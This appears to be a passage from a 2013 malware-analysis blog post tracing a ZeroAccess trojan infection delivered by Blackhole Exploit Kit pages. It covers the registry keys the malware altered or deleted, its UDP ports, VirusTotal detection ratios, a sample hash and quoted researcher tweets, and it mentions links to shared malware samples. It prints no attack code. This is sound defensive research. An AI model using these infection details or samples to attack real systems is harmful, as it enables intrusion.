HKLM\Software\Classes\ClsId\{...some ID....}\InprocServer32\↑wow, looks like a setup for a deletion ... Noticing the above, I just realized that my below registry keys were deleted/gone..
--→"C:\WINDOWS\system32\wbem\fastprox.dll"/"C:\RECYCLER\S-1-5-18\$6576a1a85f9fdb0e20568660563a58ee\n."..\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicyNow I know why it seeked those strings of programs in debugging, to DELETE them.. Moreover saw an a fail attempt of starting the Active Directory Domain Services Database Mounting Tool or SERVICES_ACTIVE_DATABASE, binding to the localhost...
..\System\CurrentControlSet\Services\wscsvc\SecurityWhat's this mess?
So we are dealing with what malware then? 1) a trojan (for sure, by all infection MO & erasing stuffs) + staring service, but for what? I wonder what would happened if one of those request to had seccessfully established. IF it sent data then we have 2) a spyware which is having these characteristics. Let's reseacrh further, viewing the way it made changes in registry at the recycle keys/values made made me bumped to the good writing about ZeroAccess Recycler version here -->>[TigzyBlog]And UDP/16464 found it as the ZeroAccess/alias MaxPlus, Sirefef variant. Thank's to the Tigzy-RK for a useful writing -->Tigzy-RKAnd all of the advices I received, I thank you.Samples
Here's the overall samples -->>[HERE](Samples are shared for raising detection ratio & research purpose) *) Thank you to @Horgh_rce for adding the unpack version of the malware. It's really good to know that I didn't miss a thing during debugging.Virus Total
Below is detection ratio as per detected moment of the samples in VT:Landing page : (1/46) -->>[VT]PDF1 : (20/46) -->>[VT]PDF2 : (13/46) -->>[VT]JAR1 : (6/46) -->>[VT]JAR2 : (5/46) -->>[VT]Payload : (6/46) -->>[VT]The Infection
I don't have time to check these all but all of these BHEK are infecting same ZeroAccess variant now. Marked the domain name & BHEK "/closest" path:The PoC of the list in the picture above is --->>[HERE] and here -->>[HERE]
Thank you for your help, advice & cooperation!
The trojan is the ZeroAccess recycler variant. Unpacked : 36e5a4019e41cc52247a558afc794b57— Horgh (@Horgh_rce) February 5, 2013And I currently trace all infected machines (a lot more then 500,000 ip) you can contact me if you want more info.— Hugo Caron (@y0ug) February 5, 2013Traffic on 16464/UDP - 16471/UDP is a sign of ZeroAccess trojan— Gary Portnoy (@gxp7891) February 6, 2013